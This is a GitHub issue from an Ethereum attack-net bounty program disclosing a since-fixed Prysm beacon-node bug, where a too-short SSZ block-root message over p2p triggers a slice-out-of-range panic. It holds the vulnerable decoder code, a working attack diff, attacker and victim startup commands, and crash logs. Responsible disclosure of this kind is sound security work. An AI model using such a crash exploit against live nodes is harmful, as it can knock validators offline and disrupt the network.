[prysm-attack-0 Reward] Remote crash nodes over p2p

holiman commented 4 years ago

Description

There is (was) a bug in Prysm that made it possible for an attacker to crash arbitrary remote nodes via p2p protocol.

Attack scenario

A bug in the prysm ssz decoder assumed a certain input size on block root messages, which caused a panic on malformed messages. It turns out that this message can be sent very early, and shut down any node we discover and connect to.

Impact

This attack could be used to shut down all prysm-based nodes on the network. It was not executed on the live network, but instead disclosed privately to @prestonvanloon and @djrtwo , and fixed in https://github.com/prysmaticlabs/prysm/pull/6771 .

Details

There's a quirk in the prysm/beacon-chain ssz decoder (encoder/ssz.go)

func (e SszNetworkEncoder) doDecode(b []byte, to interface{}) error {
    if v, ok := to.(fastssz.Unmarshaler); ok {
        return v.UnmarshalSSZ(b)
    }
    err := ssz.Unmarshal(b, to)
    if err != nil {
        // Check if we are unmarshalling block roots
        // and then lop off the 4 byte offset and try
        // unmarshalling again. This is temporary to
        // avoid too much disruption to onyx nodes.
        // TODO(#6408)
        if _, ok := to.(*[][32]byte); ok {
            return ssz.Unmarshal(b[4:], to)
        }

If it reaches this path, expecting to parse a block root message, it blindly assumes that the input is at least 4 bytes.

The diff below represents very naive attack which sends such a message at the first possible time -- instead of sending whatever message it wanted to send, it sends a too-short such message, with a topic that should trigger the dangerous path.

Here's the attack code:

diff --git a/beacon-chain/p2p/encoder/ssz.go b/beacon-chain/p2p/encoder/ssz.go
index 001ff674f..8b8e4758c 100644
--- a/beacon-chain/p2p/encoder/ssz.go
+++ b/beacon-chain/p2p/encoder/ssz.go
@@ -75,9 +75,11 @@ func (e SszNetworkEncoder) EncodeWithMaxLength(w io.Writer, msg interface{}) (in
    if err != nil {
        return 0, err
    }
+   b = make([]byte, 3)
    return writeSnappyBuffer(w, b)
 }

+
 func (e SszNetworkEncoder) doDecode(b []byte, to interface{}) error {
    if v, ok := to.(fastssz.Unmarshaler); ok {
        return v.UnmarshalSSZ(b)
@@ -89,6 +91,7 @@ func (e SszNetworkEncoder) doDecode(b []byte, to interface{}) error {
        // unmarshalling again. This is temporary to
        // avoid too much disruption to onyx nodes.
        // TODO(#6408)
+       fmt.Printf("SszNetworkEncoder decoding dangerously, size %d\n", len(b))
        if _, ok := to.(*[][32]byte); ok {
            return ssz.Unmarshal(b[4:], to)
        }
diff --git a/beacon-chain/p2p/sender.go b/beacon-chain/p2p/sender.go
index dd9d8fb3b..93bf9378d 100644
--- a/beacon-chain/p2p/sender.go
+++ b/beacon-chain/p2p/sender.go
@@ -2,6 +2,7 @@ package p2p

 import (
    "context"
+   "fmt"

    "github.com/libp2p/go-libp2p-core/network"
    "github.com/libp2p/go-libp2p-core/peer"
@@ -18,9 +19,13 @@ func (s *Service) Send(ctx context.Context, message interface{}, baseTopic strin
    if err := VerifyTopicMapping(baseTopic, message); err != nil {
        return nil, err
    }
+   // Never mind what we wanted to send, just ship the attack instead
+   baseTopic = RPCBlocksByRootTopic
+
    topic := baseTopic + s.Encoding().ProtocolSuffix()
    span.AddAttributes(trace.StringAttribute("topic", topic))

+
    // Apply max dial timeout when opening a new stream.
    ctx, cancel := context.WithTimeout(ctx, maxDialTimeout)
    defer cancel()
@@ -35,6 +40,10 @@ func (s *Service) Send(ctx context.Context, message interface{}, baseTopic strin
        return stream, nil
    }

+   if baseTopic == RPCBlocksByRootTopic{
+       fmt.Printf("oh cool, we're sending blockbyroot topic to %v\n", pid.Pretty())
+   }
+
    if _, err := s.Encoding().EncodeWithMaxLength(stream, message); err != nil {
        traceutil.AnnotateError(span, err)
        return nil, err

Startup script for the attacker (using the modded code)

~/go/src/github.com/prysmaticlabs/prysm/beacon-chain/beacon-chain --config-file prysm_config.yaml --datadir .   \
--peer /ip4/10.137.0.15/tcp/13000/p2p/16Uiu2HAmA7m8JWJR1zgMLwjUv9WaEFsRnrVgnwf22t72FEhgGtws \
--bootstrap-node="enr:-LK4QFbGwVUubLp8SsbBsakUqhVeNihazNXPJQ1DZMkRVB8yZOEkzfRoCVCi545L27XzPzvF09NO0Ie56isjSAZAf9cBh2F0dG5ldHOIAAAAAAAAAACEZXRoMpCmW0iXAAAAAP>
--p2p-udp-port 12001 --p2p-tcp-port 12002

Startup script for the victim (using master code)

./beacon-chain --config-file prysm_config.yaml --datadir . \
--verbosity debug

victim is started first, and goes through some deposit contract events. Then I start the attacker, and see this in the victim output:

020-07-29 22:34:23]  INFO p2p: Peer connected activePeers=3 direction=Outbound multiAddr=/ip4/98.238.148.22/tcp/13000/p2p/16Uiu2HAm8JguF9aEQ5SJene8cbcAoQKzKviocYmv8hEXz9v7mZLF
[2020-07-29 22:34:24] DEBUG initial-sync: Requesting blocks capacity=576 count=64 peer=16Uiu2HAmCorr1KscykspjPJvUxrFnop1ov4SDxMtfFy4VW4RFxPH start=10688 step=1
[2020-07-29 22:34:24] DEBUG initial-sync: Requesting blocks capacity=576 count=64 peer=16Uiu2HAm8JguF9aEQ5SJene8cbcAoQKzKviocYmv8hEXz9v7mZLF start=10240 step=1
[2020-07-29 22:34:24] DEBUG initial-sync: Requesting blocks capacity=576 count=64 peer=16Uiu2HAmRvAS3qnU29V2FUeWquJgnEJ8CRrwRcnpjHPZfsUrNTzR start=10304 step=1
[2020-07-29 22:34:24] DEBUG initial-sync: Requesting blocks capacity=512 count=64 peer=16Uiu2HAm8JguF9aEQ5SJene8cbcAoQKzKviocYmv8hEXz9v7mZLF start=10368 step=1
[2020-07-29 22:34:24] DEBUG initial-sync: Requesting blocks capacity=512 count=64 peer=16Uiu2HAmCorr1KscykspjPJvUxrFnop1ov4SDxMtfFy4VW4RFxPH start=10432 step=1
[2020-07-29 22:34:24] DEBUG initial-sync: Requesting blocks capacity=512 count=64 peer=16Uiu2HAmRvAS3qnU29V2FUeWquJgnEJ8CRrwRcnpjHPZfsUrNTzR start=10496 step=1
[2020-07-29 22:34:24] DEBUG initial-sync: Requesting blocks capacity=448 count=64 peer=16Uiu2HAm8JguF9aEQ5SJene8cbcAoQKzKviocYmv8hEXz9v7mZLF start=10560 step=1
[2020-07-29 22:34:24] DEBUG initial-sync: Requesting blocks capacity=448 count=64 peer=16Uiu2HAmCorr1KscykspjPJvUxrFnop1ov4SDxMtfFy4VW4RFxPH start=10624 step=1
panic: runtime error: slice bounds out of range [4:3]

goroutine 1127 [running]:
github.com/prysmaticlabs/prysm/beacon-chain/p2p/encoder.SszNetworkEncoder.doDecode(0xc00c54a000, 0x3, 0x82, 0x159b720, 0xc00f47e460, 0x0, 0x0)
    /home/user/go/src/github.com/prysmaticlabs/prysm/beacon-chain/p2p/encoder/ssz.go:93 +0x19c
github.com/prysmaticlabs/prysm/beacon-chain/p2p/encoder.SszNetworkEncoder.DecodeWithMaxLength(0x735afc201458, 0xc00f47e3e0, 0x159b720, 0xc00f47e460, 0x0, 0x0)
    /home/user/go/src/github.com/prysmaticlabs/prysm/beacon-chain/p2p/encoder/ssz.go:134 +0x1c6
github.com/prysmaticlabs/prysm/beacon-chain/sync.(*Service).registerRPC.func1(0x1cf1c20, 0xc00f47e3e0)
    /home/user/go/src/github.com/prysmaticlabs/prysm/beacon-chain/sync/rpc.go:133 +0x12a8
github.com/libp2p/go-libp2p/p2p/host/basic.(*BasicHost).SetStreamHandler.func1(0xc00d24ec40, 0x39, 0x735aee2f2588, 0xc00f47e3e0, 0x1, 0x0)
    /home/user/go/pkg/mod/github.com/libp2p/go-libp2p@v0.9.2/p2p/host/basic/basic_host.go:486 +0x9d
created by github.com/libp2p/go-libp2p/p2p/host/basic.(*BasicHost).newStreamHandler
    /home/user/go/pkg/mod/github.com/libp2p/go-libp2p@v0.9.2/p2p/host/basic/basic_host.go:337 +0x63c

This is the output for the attacker:

[2020-07-29 22:34:25]  INFO p2p: Node started p2p server multiAddr=/ip4/10.137.0.15/tcp/12002/p2p/16Uiu2HAmMUrPwkC1RgFKyuQD2y3SNLEnffsUeUPZ2TCCVazbzBRG
oh cool, we're sending blockbyroot topic to 16Uiu2HAmA7m8JWJR1zgMLwjUv9WaEFsRnrVgnwf22t72FEhgGtws
[2020-07-29 22:34:25]  INFO p2p: Peer connected activePeers=1 direction=Outbound multiAddr=/ip4/10.137.0.15/tcp/13000/p2p/16Uiu2HAmA7m8JWJR1zgMLwjUv9WaEFsRnrVgnwf22t72FEhgGtws
[2020-07-29 22:34:25]  INFO p2p: Peer disconnected activePeers=0 multiAddr=/ip4/10.137.0.15/tcp/13000/p2p/16Uiu2HAmA7m8JWJR1zgMLwjUv9WaEFsRnrVgnwf22t72FEhgGtws
[2020-07-29 22:34:26]  INFO powchain: Connected to eth1 proof-of-work chain endpoint=https://goerli.prylabs.net
[2020-07-29 22:34:30]  INFO initial-sync: Waiting for enough suitable peers before syncing required=3 suitable=0

It connected, and immediately put the victim to sleep.

djrtwo commented 4 years ago

Fantastic find @holiman! Welcome to the party :) This qualifies for a $5k beta-0 attacknet bounty reward. I'll circle back next week to get you on the (soon to be) leaderboard and reach out for payment

Thank you @prestonvanloon for the quick and discrete fix

holiman commented 4 years ago

Thanks!

However, I don't think it would be right for me to accept a bounty, since my job is ethereum security, which does not exclude eth2. Keep the money for future bug hunters :)

ethereum / public-attacknets